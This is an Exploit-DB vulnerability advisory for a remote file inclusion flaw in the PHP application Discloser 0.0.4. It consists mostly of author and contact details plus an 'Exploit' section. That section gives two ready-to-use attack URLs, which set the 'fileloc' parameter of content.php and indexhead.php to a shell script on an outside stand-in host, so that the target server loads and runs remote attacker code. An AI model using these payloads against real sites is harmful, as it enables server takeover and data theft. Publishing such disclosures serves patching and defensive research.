Discloser 0.0.4 - 'fileloc' Remote File Inclusion

EDB-ID:

2188

Author:

Arash RJ

Type:

webapps

Platform:

PHP

Published:

2006-08-15

|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| discloser 0.0.4 Remote File Inclusion Vulnerability
|
| Download: http://optusnet.dl.sourceforge.net/sourceforge/discloser/discloser-0.0.4.tar.gz
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Contact|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| Discoverd by: Arash RJ
|
| Team: PersianFox Digital Security Team
|
| URL: http://www.PersianFox.com
|
| E-Mail: arashrj@gmail.com
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Exploit|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
|
| http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|

# milw0rm.com [2006-08-15]